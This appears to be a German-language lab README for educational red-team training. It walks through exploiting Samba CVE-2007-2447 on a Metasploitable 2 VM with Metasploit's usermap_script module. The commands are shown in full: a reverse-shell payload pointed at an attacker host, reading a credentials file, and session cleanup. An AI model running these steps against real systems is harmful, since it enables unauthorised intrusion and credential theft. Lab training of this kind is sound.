
Schritt-für-Schritt-Penetrationstest-Labor, das Samba CVE-2007-2447 auf Metasploitable 2 mit Metasploit ausnutzt und Root-Kompromittierung, Diebstahl von Anmeldeinformationen und Datenextfiltration für pädagogisches Red-Team-Training demonstriert.
RedTeam-SMB-PenTest |
|
msfconsole
Stellen Sie sicher, dass sowohl der Angreifer-Host als auch die Opfermaschine gestartet sind und laufen.

search samba
use exploit/multi/samba/usermap_script
set RHOST <target_ip>
set LHOST <attacker_ip>
set payload cmd/unix/reverse
exploit
whoami
hostname
cd /redteam7/student3
cat mypass.txt
# Leave current shell
Ctrl C
exit
# Kill all background jobs
sessions -K
jobs -K
# Restart Metasploit
msfconsole
usermap_script sind hochgradig verwundbar.| Komponente | Details |
|---|
| Angreifer-VM | Kali Linux |
| Opfer-VM | Metasploitable 2 |
| Zielport | 445 (Samba/SMB) |
| Verwendeter Exploit | exploit/multi/samba/usermap_script |
| Ziel der Anmeldedaten | /redteam7/student3/mypass.txt |